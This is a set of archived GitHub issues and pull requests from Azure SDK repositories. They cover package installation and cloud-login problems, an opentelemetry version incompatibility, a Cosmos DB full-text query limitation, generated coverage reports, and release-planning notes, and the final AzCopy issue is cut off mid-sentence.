━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 4.0/4.0 MB 55.9 MB/s eta 0:00:00:00:010:01
Collecting azure-storage-blob<13.0.0,>=12.10.0
Downloading azure_storage_blob-12.14.1-py3-none-any.whl (383 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 383.2/383.2 kB 28.9 MB/s eta 0:00:00
Requirement already satisfied: azure-mgmt-core<2.0.0,>=1.3.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (1.3.0)
Requirement already satisfied: azure-common<2.0.0,>=1.1 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (1.1.28)
Requirement already satisfied: msrest>=0.6.18 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (0.6.21)
Collecting strictyaml<=1.6.1
Downloading strictyaml-1.6.1.tar.gz (137 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 137.7/137.7 kB 11.9 MB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Requirement already satisfied: azure-core!=1.22.0,<2.0.0,>=1.8.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (1.22.1)
Requirement already satisfied: pydash<6.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (4.9.0)
Requirement already satisfied: pyyaml<7.0.0,>=5.1.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (6.0)
Requirement already satisfied: colorama<=0.4.4 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (0.4.4)
Collecting azure-storage-file-datalake<13.0.0
Downloading azure_storage_file_datalake-12.9.1-py3-none-any.whl (238 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 238.8/238.8 kB 23.0 MB/s eta 0:00:00
Requirement already satisfied: tqdm<=4.63.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (4.63.0)
Requirement already satisfied: pyjwt<3.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (2.3.0)
Requirement already satisfied: marshmallow<4.0.0,>=3.5 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (3.17.0)
Requirement already satisfied: typing-extensions<5.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (<IP_ADDRESS>)
Requirement already satisfied: azure-storage-file-share<13.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (12.7.0)
Requirement already satisfied: isodate in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (0.6.1)
Requirement already satisfied: jsonschema<5.0.0,>=4.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (4.13.0)
Requirement already satisfied: six>=1.11.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (1.16.0)
Requirement already satisfied: requests>=2.18.4 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (2.28.1)
Requirement already satisfied: cryptography>=2.1.4 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-storage-blob<13.0.0,>=12.10.0->azure-ai-ml) (37.0.4)
Collecting msrest>=0.6.18
Downloading msrest-0.7.1-py3-none-any.whl (85 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 85.4/85.4 kB 10.9 MB/s eta 0:00:00
Collecting azure-core!=1.22.0,<2.0.0,>=1.8.0
Downloading azure_core-1.26.0-py3-none-any.whl (178 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 178.9/178.9 kB 21.4 MB/s eta 0:00:00
Collecting typing-extensions<5.0.0
Downloading typing_extensions-4.4.0-py3-none-any.whl (26 kB)
Requirement already satisfied: pyrsistent!=0.17.0,!=0.17.1,!=0.17.2,>=0.14.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from jsonschema<5.0.0,>=4.0.0->azure-ai-ml) (0.18.1)
Requirement already satisfied: attrs>=17.4.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from jsonschema<5.0.0,>=4.0.0->azure-ai-ml) (22.1.0)
Requirement already satisfied: packaging>=17.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from marshmallow<4.0.0,>=3.5->azure-ai-ml) (21.3)
Requirement already satisfied: requests-oauthlib>=0.5.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from msrest>=0.6.18->azure-ai-ml) (1.3.1)
Requirement already satisfied: certifi>=2017.4.17 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from msrest>=0.6.18->azure-ai-ml) (2022.6.15)
Requirement already satisfied: python-dateutil>=2.6.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from strictyaml<=1.6.1->azure-ai-ml) (2.8.2)
Requirement already satisfied: cffi>=1.12 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from cryptography>=2.1.4->azure-storage-blob<13.0.0,>=12.10.0->azure-ai-ml) (1.15.1)
Requirement already satisfied: pyparsing!=3.0.5,>=2.0.2 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from packaging>=17.0->marshmallow<4.0.0,>=3.5->azure-ai-ml) (3.0.9)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests>=2.18.4->azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (1.26.11)
Requirement already satisfied: charset-normalizer<3,>=2 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests>=2.18.4->azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (2.1.0)
Requirement already satisfied: idna<4,>=2.5 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests>=2.18.4->azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (3.3)
Requirement already satisfied: oauthlib>=3.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests-oauthlib>=0.5.0->msrest>=0.6.18->azure-ai-ml) (3.2.0)
Requirement already satisfied: pycparser in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from cffi>=1.12->cryptography>=2.1.4->azure-storage-blob<13.0.0,>=12.10.0->azure-ai-ml) (2.21)
Building wheels for collected packages: strictyaml
Building wheel for strictyaml (setup.py) ... done
Created wheel for strictyaml: filename=strictyaml-1.6.1-py3-none-any.whl size=123931 sha256=7f10357971c55b3c29d2dbee29b816db58830ad42ac89258d28bd87636c1f5a7
Stored in directory: /home/azureuser/.cache/pip/wheels/fb/ca/49/3c5046dee736c4c938048ce89b236b1643ea83178517b5f88a
Successfully built strictyaml
Installing collected packages: typing-extensions, strictyaml, azure-core, msrest, azure-storage-blob, azure-storage-file-datalake, azure-ai-ml
Attempting uninstall: typing-extensions
Found existing installation: typing-extensions <IP_ADDRESS>
Uninstalling typing-extensions-<IP_ADDRESS>:
Successfully uninstalled typing-extensions-<IP_ADDRESS>
Attempting uninstall: azure-core
Found existing installation: azure-core 1.22.1
Uninstalling azure-core-1.22.1:
Successfully uninstalled azure-core-1.22.1
Attempting uninstall: msrest
Found existing installation: msrest 0.6.21
Uninstalling msrest-0.6.21:
Successfully uninstalled msrest-0.6.21
Attempting uninstall: azure-storage-blob
Found existing installation: azure-storage-blob 12.9.0
Uninstalling azure-storage-blob-12.9.0:
Successfully uninstalled azure-storage-blob-12.9.0
Successfully installed azure-ai-ml-1.0.0 azure-core-1.26.0 azure-storage-blob-12.14.1 azure-storage-file-datalake-12.9.1 msrest-0.7.1 strictyaml-1.6.1 typing-extensions-4.4.0
Note: you may need to restart the kernel to use updated packages.
---------CELL 4---------
import logging
import requests
import os
from azure.ai.ml import MLClient
from azure.identity import AzureAuthorityHosts, DefaultAzureCredential
from azure.ai.ml.entities import Workspace
subscription_id = "YOUR_VALUE_HERE"
resource_group = "YOUR_VALUE_HERE"
workspace_name = "YOUR_VALUE_HERE"
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
try:
credential = DefaultAzureCredential(authority=AzureAuthorityHosts.AZURE_GOVERNMENT)
except Exception as ex:
raise ex
print(credential)
try:
kwargs = {"cloud": "AzureUSGovernment"}
ml_client = MLClient(credential, subscription_id, resource_group, **kwargs)
except Exception as ex:
raise ex
print(ml_client)
# Get a list of workspaces in a resource group
for ws in ml_client.workspaces.list():
print(ws.name, ":", ws.location, ":", ws.description)
Could you please try to login to azure cli from the same machine from where you are running the notebooks and set the default subscription?
az cloud set -n AzureUSGovernment
az account set -s <SUBSCRIPTION-ID>
This should set the default subscription for you on the machine.
I have tried the following code snippet in Government cloud, and this is working with azure-ai-ml==1.0.0.
Had to update the call to create compute by appending .result() for LRO poller.
from azure.ai.ml.entities import AmlCompute
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential, AzureAuthorityHosts
import traceback
# Enter details of your subscription
subscription_id = "SOME-SUBSCRITION-ID-IN-GOVT-CLOUD"
resource_group = "test-rg-221005"
workspace_name = "est-usgovvirginia"
credentials = DefaultAzureCredential(authority=AzureAuthorityHosts.AZURE_GOVERNMENT)
kwargs = {"cloud": "AzureUSGovernment"}
ml_client = MLClient(credential, subscription_id, resource_group, **kwargs)
ml_client = MLClient(
credential=credentials,
subscription_id=subscription_id,
resource_group_name=resource_group,
workspace_name=workspace_name,
cloud="AzureUSGovernment",
)
# Name assigned to the compute cluster
cpu_compute_target = "cpu-cluster-3"
try:
# let's see if the compute target already exists
cpu_cluster = ml_client.compute.get(cpu_compute_target)
print(
f"You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
)
except Exception:
print("Creating a new cpu compute target...")
# Let's create the Azure ML compute object with the intended parameters
cpu_cluster = AmlCompute(
name=cpu_compute_target,
# Azure ML Compute is the on-demand VM service
type="amlcompute",
# VM Family
size="STANDARD_DS3_V2",
# Minimum running nodes when there is no job running
min_instances=0,
# Nodes in cluster
max_instances=4,
# How many seconds will the node running after the job termination
idle_time_before_scale_down=180,
# Dedicated or LowPriority. The latter is cheaper but there is a chance of job termination
tier="Dedicated",
)
# Now, we pass the object to MLClient's create_or_update method
cpu_cluster = ml_client.compute.begin_create_or_update(cpu_cluster).result()
print(
f"AMLCompute with name {cpu_cluster.name} is created, the compute size is {cpu_cluster.size}"
)
Returned the following:
Creating a new cpu compute target...
AMLCompute with name cpu-cluster-3 is created, the compute size is STANDARD_DS3_V2
@adrian-gonzalez : I created a new Conda environment and installed the GA version of SDK (1.0.0) and tried running the notebook in usgovvirginia region to repro this issue but unfortunately, I was able to able to reproduce this issue after I configure the cloud name and account using CLI.
az cloud set -n AzureUSGovernment
az account set -s <SUBSCRIPTION-ID>
By default, the SDK or CLI tries to connect to public cloud.
Hi @harneetvirk -
Please read through our previous comments.
The steps to reproduce the issue lies with azure-ai-ml v2.4.1.
it is this version that is the default when we are creating an instance of Azure Machine Learning, and therefore preventing our team from using this python package.
azure-ai-ml v2.4.1 is having some known issues and will be removed from CI from the next release and will be replaced with azure-ai-ml 1.0.0 from pypi. To unblock, please install azure-ai-ml 1.0.0 from pypi.
Thank you @harneetvirk . We can do that as a temporary workaround.
When is the next release slated for?
Can you confirm if once azure-ai-ml v2.4.1 is removed from CI, whether newly created AML instance won't have this issue moving forward?
Just want to be sure that from a developer experience, that teams creating new AML instances don't have to always manually downgrade the auzre-ai-ml package to 1.0.0
@xiangyan99 can you or @harneetvirk provide guidance on the remaining above questions? I would like to confirm that the issue is resolved and that the steps to reproduce no longer result in the issue prior to closing this issue out.
@adrian-gonzalez if you don't mind, could you open a new issue with the questions?
Thanks.
@xiangyan99 That doesn't seem efficient, are you sure we want to go that route? It'll effectively a copy of this issue to not duplicate the steps to reproduce and discussions.
Happy to do that if that's the approach
/unresolve
@xiangyan99 can you or @harneetvirk provide guidance on the remaining above questions? I would like to confirm that the issue is resolved and that the steps to reproduce no longer result in the issue prior to closing this issue out.
The new CI image has been released with SDK v2 package installed from pypi. Please create a new Compute Instance.
Thanks @harneetvirk!
|
2025-04-01T06:36:45.469410
| 2022-12-10T02:06:06
|
1487792278
|
{
"authors": [
"jabbera",
"jeremydvoss",
"kashifkhan"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:361",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/27900"
}
|
gharchive/issue
|
azure-monitor-opentelemetry-exporter not compatible with latest opentelemetry-[api/sdk] 1.15.0
Package Name: azure-monitor-opentelemetry-exporter
Package Version: 1.0.0b10
Operating System: Linux
Python Version: 3.10
Describe the bug
not compatible with opentelemetry-[api/sdk] 1.15.0
To Reproduce
Steps to reproduce the behavior:
pip install azure-monitor-opentelemetry-exporter
python3.10
from azure.monitor.opentelemetry.exporter import AzureMonitorLogExporter, AzureMonitorTraceExporter
see:
.tox/py310-sqlalchemy14-integration/lib/python3.10/site-packages/gmo/core/util/telemetry/__init__.py:8: in <module>
from azure.monitor.opentelemetry.exporter import AzureMonitorLogExporter, AzureMonitorTraceExporter
.tox/py310-sqlalchemy14-integration/lib/python3.10/site-packages/azure/monitor/opentelemetry/exporter/__init__.py:7: in <module>
from azure.monitor.opentelemetry.exporter.export.logs._exporter import AzureMonitorLogExporter
.tox/py310-sqlalchemy14-integration/lib/python3.10/site-packages/azure/monitor/opentelemetry/exporter/export/logs/_exporter.py:8: in <module>
from opentelemetry.sdk._logs.severity import SeverityNumber
E ModuleNotFoundError: No module named 'opentelemetry.sdk._logs.severity'
Expected behavior
import to work
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
Thank you for your feedback @jabbera . We will investigate asap and get back to you
The PR is merged. However, since this is an ongoing issue, let's keep this open until the next release. I am looking into whether we can do a release before January. In the meantime, use OTel 1.14
There's another issue: when using the fixed version of the exporter with OTel 1.15, I consistently get the following warning:
...\site-packages\werkzeug\serving.py:716: ResourceWarning: unclosed <socket.socket fd=1304, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0> self.socket = socket.fromfd(fd, address_family, socket.SOCK_STREAM) ResourceWarning: Enable tracemalloc to get the object allocation traceback
I've determined that no commit in exporter 1.0.0b11 has caused this. It's too early to know. But it seems to be an issue with how opentelemetry-instrumentation-flask==0.36b0 or opentelemetry-instrumentation-wsgi==0.36b0 use Werkzeug. I've confirmed the fixed version of the exporter does still send telemetry correctly. However, since the new version needs to be pinned to 1.15, we'll be encouraging people to use 1.15 seems to have some issue that needs to be addressed.
I am not able to release the exporter as is because of the memory issue with OTel 1.15. Instead, we can pin the exporter to 1.12<=x<=1.14 before the module path was changed. That way, we can avoid the memory allocation issue as well as the severity import breaking change.
My release PR is approved. But my understanding is others have the exclusive permissions to merge it and trigger the release pipeline.
https://github.com/Azure/azure-sdk-for-python/pull/27958
@jabbera Please use newly released 1.0.0b11. It blocks OTel 1.15. Resolving issue.
|
2025-04-01T06:36:45.477327
| 2024-12-12T19:19:33
|
2736699898
|
{
"authors": [
"Pilchie",
"sachintha180",
"simorenoh"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:362",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/38857"
}
|
gharchive/issue
|
Do Azure Cosmos DB full text functions (FullTextContains, FullTextScore, etc.) not support cross partition queries?
Hi, I'm trying to understand if Full Text Search (on Azure Cosmos DB Python SDK) isn't supported across partitions.
I'm led to believe this as a result of the following:
When I run this query to get a few documents from my Azure Cosmos DB collection using Full Text Search, where I provide the partition key (no cross partition querying enabled):
summary_nodes = self.cosmos.query_items(
query="""
SELECT c.id, c.text
FROM c
ORDER BY RANK FullTextScore(c.text, @text)
""",
partition_key="cbd31f95-a3a6-4a85-ba8a-67925980d37c",
parameters=[
{"name": "@text", "value": text},
],
verbose=True,
)
print(summary_nodes)
I get the desired output:
[{'id': 'cbd31f95-a3a6-4a85-ba8a-67925980d37c', 'text': "The letter dated 11th October 2024...."}]
However, when I run the exact same query without providing the partition key with cross partition querying enabled:
summary_nodes = self.cosmos.query_items(
query="""
SELECT c.id, c.text
FROM c
ORDER BY RANK FullTextScore(c.text, @text)
""",
parameters=[
{"name": "@text", "value": text},
],
verbose=True,
enable_cross_partition_query=True,
)
print(summary_nodes)
I'm met with the following error:
{"code":"BadRequest","message":"One of the input values is invalid.\r\nActivityId: 9c5f1c20-e0eb-4dcd-b965-c404a2af537b, Windows/10.0.20348 cosmos-netstandard-sdk/3.18.0"}
I've set up all indexing policies + full text policies correctly (as evident by the working code snippet).
Here are the policies for reference:
full_text_policy = {
"defaultLanguage": "en-US",
"fullTextPaths": [{"path": "/text", "language": "en-US"}],
}
# Reference: https://learn.microsoft.com/en-us/azure/cosmos-db/index-policy
indexing_policy = {
"indexingMode": "consistent",
"automatic": True,
"includedPaths": [
{
"path": "/*",
}
],
"excludedPaths": [{"path": '/"_etag"/?', "path": "/vector/*"}],
"fullTextIndexes": [
{
"path": "/text",
}
],
"vectorIndexes": [
{
"path": "/vector",
"type": "quantizedFlat",
}
],
}
In the above code snippets, I've used my own self.cosmos.query_items function - which is a function that shadows the Azure Cosmos Python SDK's container.query_items function, as follows:
def query_items(
self,
query: str,
partition_key: str | None = None,
verbose=False,
parameters: List[Dict[str, object]] | None = None,
**kwargs,
):
try:
items = list(
self.container.query_items(
query=query,
parameters=parameters,
partition_key=partition_key,
**kwargs,
)
)
if verbose:
print("[AZCOSMOSDB]\tFound {0} items".format(len(items)))
return items
except exceptions.CosmosHttpResponseError as e:
if verbose:
print("[AZCOSMOSDB]\tCannot query items.")
print(e.http_error_message)
Looking forward to any clarification - thank you for your time!
@simorenoh - can you take a look?
Hi @sachintha180, thank you for opening this issue. This is actually a known gap in the FTS query feature for the service currently - parametrized cross partition queries using Order By Rank will not work. We are currently working on fixing this.
However, you can still get cross partition queries to work with FTS by sending the entire query directly, ie
query="SELECT c.id, c.text FROM c ORDER BY RANK FullTextScore(c.text, ['text-here']) ", or using string formatting directly using either %s or Python's .format string method on the query before sending it.
Do let me know if this answers your question or if there's anything else you need help with - I can also ping in this issue again once we have merged the fix on our end if you'd like.
It definitely does! - I was a bit hesitant in using string formatting due to SQL injection. But I'll write a few checks to overcome this prior formatting the query.
Thank you very much, looking forward to a ping when the issue is merged. Thank you for your time!
|
2025-04-01T06:36:45.493280
| 2017-12-14T18:52:36
|
282202846
|
{
"authors": [
"AutorestCI",
"codecov-io"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:363",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/1710"
}
|
gharchive/pull-request
|
[Monitor] Add Public Preview APIs of Metric Baseline
Generated from RestAPI PR: https://github.com/Azure/azure-rest-api-specs/pull/2049
Codecov Report
Merging #1710 into master will decrease coverage by 0.03%.
The diff coverage is 41.39%.
@@ Coverage Diff @@
## master #1710 +/- ##
==========================================
- Coverage 55.33% 55.29% -0.04%
==========================================
Files 4202 4215 +13
Lines 100158 100436 +278
==========================================
+ Hits 55422 55540 +118
- Misses 44736 44896 +160
Impacted Files
Coverage Δ
...itor/azure/mgmt/monitor/models/retention_policy.py
62.5% <0%> (-8.93%)
:arrow_down:
...iagnostic_settings_category_resource_collection.py
66.66% <0%> (-13.34%)
:arrow_down:
...nitor/azure/mgmt/monitor/models/metric_settings.py
50% <0%> (-5.56%)
:arrow_down:
...tor/azure/mgmt/monitor/models/autoscale_profile.py
45.45% <0%> (-4.55%)
:arrow_down:
...onitor/azure/mgmt/monitor/models/scale_capacity.py
55.55% <0%> (-6.95%)
:arrow_down:
...t-monitor/azure/mgmt/monitor/models/time_window.py
55.55% <0%> (-6.95%)
:arrow_down:
...mt-monitor/azure/mgmt/monitor/models/recurrence.py
62.5% <0%> (-8.93%)
:arrow_down:
...-monitor/azure/mgmt/monitor/models/sms_receiver.py
50% <0%> (-5.56%)
:arrow_down:
...-monitor/azure/mgmt/monitor/models/scale_action.py
50% <0%> (-5.56%)
:arrow_down:
...mt-monitor/azure/mgmt/monitor/models/scale_rule.py
62.5% <0%> (-8.93%)
:arrow_down:
... and 81 more
Continue to review full report at Codecov.
Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update 0c191e5...ae48b11. Read the comment docs.
|
2025-04-01T06:36:45.495628
| 2018-05-30T23:11:16
|
327930993
|
{
"authors": [
"AutorestCI"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:364",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/2668"
}
|
gharchive/pull-request
|
[AutoPR network/resource-manager] reverted methods removal
Created to sync https://github.com/Azure/azure-rest-api-specs/pull/3163
(message created by the CI based on PR content)
This PR has been merged into https://github.com/Azure/azure-sdk-for-python/pull/2376
|
2025-04-01T06:36:45.500832
| 2023-08-31T18:14:08
|
1876049881
|
{
"authors": [
"azure-sdk",
"nemanjarajic"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:365",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/31903"
}
|
gharchive/pull-request
|
Schedule operations rewire for feature and custom
Description
Please add an informative description that covers that changes made by the pull request and link all relevant issues.
If an SDK is being regenerated based on a new swagger spec, a link to the pull request containing these swagger spec changes has been included above.
All SDK Contribution checklist:
[ ] The pull request does not introduce [breaking changes]
[ ] CHANGELOG is updated for new features, bug fixes or other significant changes.
[ ] I have read the contribution guidelines.
General Guidelines and Best Practices
[ ] Title of the pull request is clear and informative.
[ ] There are a small number of commits, each of which have an informative message. This means that previously merged commits do not appear in the history of the PR. For more information on cleaning up the commits in your PR, see this page.
Testing Guidelines
[ ] Pull request includes test coverage for the included changes.
API change check
APIView has identified API level changes in this PR and created following API reviews.
azure-ai-ml
|
2025-04-01T06:36:45.503202
| 2023-09-23T01:14:29
|
1909657110
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:366",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/32202"
}
|
gharchive/pull-request
|
[AutoRelease] t2-cosmosdb-2023-09-23-46388(can only be merged by SDK owner)
https://github.com/Azure/sdk-release-request/issues/4551
Live test success
https://dev.azure.com/azure-sdk/internal/_build?definitionId=984
BuildTargetingString
azure-mgmt-cosmosdb
Skip.CreateApiReview
true
issue link:https://github.com/Azure/sdk-release-request/issues/4551
|
2025-04-01T06:36:45.521429
| 2019-02-20T23:12:50
|
412673365
|
{
"authors": [
"AutorestCI",
"codecov-io"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:367",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/4396"
}
|
gharchive/pull-request
|
[AutoPR datafactory/resource-manager] [Datafactory] Support create pipeline run with recovery mode
Created to sync https://github.com/Azure/azure-rest-api-specs/pull/5239
(message created by the CI based on PR content)
Codecov Report
Merging #4396 into restapi_auto_datafactory/resource-manager will increase coverage by 1.16%.
The diff coverage is 52.49%.
@@ Coverage Diff @@
## restapi_auto_datafactory/resource-manager #4396 +/- ##
=============================================================================
+ Coverage 52.28% 53.44% +1.16%
=============================================================================
Files 10470 10284 -186
Lines 226922 215872 -11050
=============================================================================
- Hits 118640 115380 -3260
+ Misses 108282 100492 -7790
Impacted Files
Coverage Δ
...ry/azure/mgmt/datafactory/models/vertica_source.py
62.5% <ø> (ø)
:arrow_up:
...ory/azure/mgmt/datafactory/models/impala_source.py
62.5% <ø> (ø)
:arrow_up:
...y/azure/mgmt/datafactory/models/mongo_db_source.py
62.5% <ø> (ø)
:arrow_up:
...zure/mgmt/datafactory/models/service_now_source.py
62.5% <ø> (ø)
:arrow_up:
.../azure/mgmt/datafactory/models/file_system_sink.py
62.5% <ø> (ø)
:arrow_up:
.../datafactory/models/document_db_collection_sink.py
62.5% <ø> (ø)
:arrow_up:
...ctory/azure/mgmt/datafactory/models/xero_source.py
62.5% <ø> (ø)
:arrow_up:
...tory/azure/mgmt/datafactory/models/drill_source.py
62.5% <ø> (ø)
:arrow_up:
...ctory/azure/mgmt/datafactory/models/oracle_sink.py
62.5% <ø> (ø)
:arrow_up:
...zure/mgmt/datafactory/models/azure_table_source.py
55.55% <ø> (ø)
:arrow_up:
... and 617 more
Continue to review full report at Codecov.
Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update 51a2757...a6e1d5b. Read the comment docs.
This PR has been merged into https://github.com/Azure/azure-sdk-for-python/pull/4381
|
2025-04-01T06:36:45.525087
| 2020-11-19T10:38:52
|
746456167
|
{
"authors": [
"MindFlavor",
"rylev"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:368",
"repo": "Azure/azure-sdk-for-rust",
"url": "https://github.com/Azure/azure-sdk-for-rust/pull/88"
}
|
gharchive/pull-request
|
Simplify ConsistencyLevel and CosmosStruct
@thomastaylor312 and I are looking into simplifying the cosmos crate. This PR contains changes to two types that are indicative of the larger changes we would like to make.
In general these changes favor concrete types over traits. Some additional changes I'd like to make include but are not limited to:
Remove the CosmosClient trait and and rename CosmosStruct to CosmosClient.
Change the hyper_client field of CosmosStruct to client and make it a Box<dyn Client> . This is somewhat dependent on other work to abstract the client usage so implementations are not dependent on a particular http implementation.
Consolidate all the clients into one client CosmosClient (aka CosmosStruct)
This is great work ❤️ . I think we probably want to merge https://github.com/Azure/azure-sdk-for-rust/pull/79 first since many modifications are probably going to create conflicts.
|
2025-04-01T06:36:45.531105
| 2023-05-24T23:01:11
|
1724841839
|
{
"authors": [
"JonathanCrd",
"maririos"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:369",
"repo": "Azure/azure-sdk-tools",
"url": "https://github.com/Azure/azure-sdk-tools/issues/6237"
}
|
gharchive/issue
|
Add default users to prod release plans
Share Release Plans created in PROD with the v-team so we can help diagnose problems and look at behaviors, specially while we do our initial rollout.
Ideally, Release Plans shouldn't have any permissions and anyone can access them
Both options to add default users to all release plans or removing the permissions would take the same amount of work. Since the future goal is to remove those permissions, I would suggest start removing them.
I have a question, in the Release Plans list view, what should be the filter? Only show the release plans for products from the selected service? Or show all of them? How could we avoid having too many records that are not relevant for the user?
I have a question, in the Release Plans list view, what should be the filter? Only show the release plans for products from the selected service? Or show all of them? How could we avoid having too many records that are not relevant for the user?
Great question. Having all will be too much noise. Filter by the service selected will work for our users (and not for the admins).
@ccbarragan how is this handled in the new UI?
As a first step, I modified the list of the Release Plans and now it shows all the release plans for the selected Service.
Also, I removed all permissions restrictions in the Release Planner APP, however, we must do the same for all other apps, since there is logic in them relying on users' permissions. To avoid this, the current users get added as an owner of the release plan whenever they click the link to open any Readiness App.
Opening this GitHub issue to keep track of those changes:
https://github.com/Azure/azure-sdk-tools/issues/6369
I forgot to summarize the changes that were made here. This is what changed:
In the Release Planner App
Brand new List of the release plans
Shows all the release plans for the selected service, not only the ones that are owned by the user
Searchable by: Name, Lifecycle stage, Product name, API type, Created by and Status.
UI enhancements: Responsive, cleaner, and leans toward the new proposed UI for the App.
Added Deeplink support for release plans
Release plans can be directly opened from a URL.
In the new "Summary" screen, added an option to copy a URL to easily share the current release plan
Added a warning in the Permissions section for a Release Planner, saying that permissions are getting deprecated in future versions, and there's no need to manually add users there anymore.
|
2025-04-01T06:36:45.532863
| 2022-08-30T18:59:49
|
1356178460
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:370",
"repo": "Azure/azure-sdk",
"url": "https://github.com/Azure/azure-sdk/issues/4768"
}
|
gharchive/issue
|
SDK Review Meeting - Tracking Azure Communication Services
This meeting was created by Jorge Garcia Hirota.
It will be used to Track the conversation in the informational Session for the Azure Communication Services Service.
Detailed meeting information and documents provided can be accessed here
Cancelled by: Jorge Garcia Hirota
|
2025-04-01T06:36:45.541174
| 2018-10-02T17:06:15
|
365993420
|
{
"authors": [
"MRayermannMSFT",
"zezha-msft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:371",
"repo": "Azure/azure-storage-azcopy",
"url": "https://github.com/Azure/azure-storage-azcopy/issues/70"
}
|
gharchive/issue
|
When output=json is used for copy, some errors aren't outputted in a JSON friendly way
Which version of the AzCopy was used?
10.0.2-preview
Which platform are you using? (ex: Windows, Mac, Linux)
Windows
What command did you run?
I ran
